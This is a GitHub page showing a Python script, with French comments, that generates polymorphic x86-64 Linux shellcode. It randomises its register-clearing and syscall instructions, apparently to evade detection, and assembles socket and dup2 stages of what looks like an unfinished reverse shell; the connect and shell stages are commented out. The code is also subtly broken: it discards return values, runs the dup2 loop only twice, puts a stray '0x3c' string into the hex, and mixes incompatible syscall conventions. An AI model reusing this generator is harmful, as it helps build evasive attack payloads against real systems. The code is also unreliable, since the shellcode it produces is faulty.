-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathgenerate_shellcode.py
More file actions
executable file
·98 lines (77 loc) · 2.24 KB
/
Copy pathgenerate_shellcode.py
File metadata and controls
executable file
·98 lines (77 loc) · 2.24 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#/usr/bin/env python3
from random import randint as r
import binascii
import socket
from sys import argv
#import htons
def clean(reg):
if str(reg) == "rax":
l = ["4831C0", "4829c0", "48c1e810"]
return l[r(0,2)]
elif str(reg) == "rbx":
l = ["4831db","4829db", "48c1eb10"]
return l[r(0,2)]
elif str(reg) == "rcx":
l = ["4831c9","4829c9", "48c1e910"]
return l[r(0,2)]
elif str(reg) == "rdx":
l = ["4831d2","4829d2", "48c1ea10"]
return l[r(0,2)]
def ip_to_opcode(ip):
return socket.inet_aton(ip)
def create_socket():
global PAYLOAD
# On set rax à 41 (le premier cas correspond à "add rax,41" le deuxième à "mov rax, 0x29")
PAYLOAD += "b029" if r(0,1) else "0429"
# On set rbx à 2 pour ensuite le copier dans rdi (le premier cas correspond à "mov bl, 0x02; mov rdi, rbx" le deuxième à "add bl, 0x02, mov rdi, rbx" le troisième correspond à un "inc rdi, inc rdi")
rand = r(0,2)
if rand == 0:
PAYLOAD += "b3024889df"
elif rand == 1:
PAYLOAD += "80c3024889df"
elif rand == 2:
PAYLOAD += "48ffc748ffc7"
clean("rbx")
# On set rbx à 1 pour ensuite le copier dans rsi (le premier cas correspond à "mov bl, 0x01; mov rsi, rbx" le deuxième à "add bl, 0x01, mov rsi, rbx" le troisième correspond à "inc rsi")
rand = r(0,2)
if rand == 0:
PAYLOAD += "b3014889de"
elif rand == 1:
PAYLOAD += "80C3014889de"
elif rand == 2:
PAYLOAD += "48ffc6"
PAYLOAD += call()
return PAYLOAD
#def socket_connect(ip, port):
#global PAYLOAD
def dup2x3():
global PAYLOAD
for i in range(0,2):
PAYLOAD += "b03f"
PAYLOAD += call()
#def shell():
#global PAYLOAD
def _exit():
global PAYLOAD
PAYLOAD+=clean("rax")
PAYLOAD+=clean("rdx")
PAYLOAD += '0x3c'
return call()
def call():
l = ["cd80","0f05"]
return str(l[r(0,1)])
def bit_to_opcode(payload):
byte = ""
# for x in range(0, len(payload)-2, 2):
return byte
PAYLOAD = ""
PAYLOAD += clean("rax")
PAYLOAD += clean("rbx")
PAYLOAD += clean("rcx")
PAYLOAD += clean("rdx")
create_socket()
dup2x3()
PAYLOAD += _exit()
#ip_to_opcode()
#print(bit_to_opcode(PAYLOAD))
print(PAYLOAD)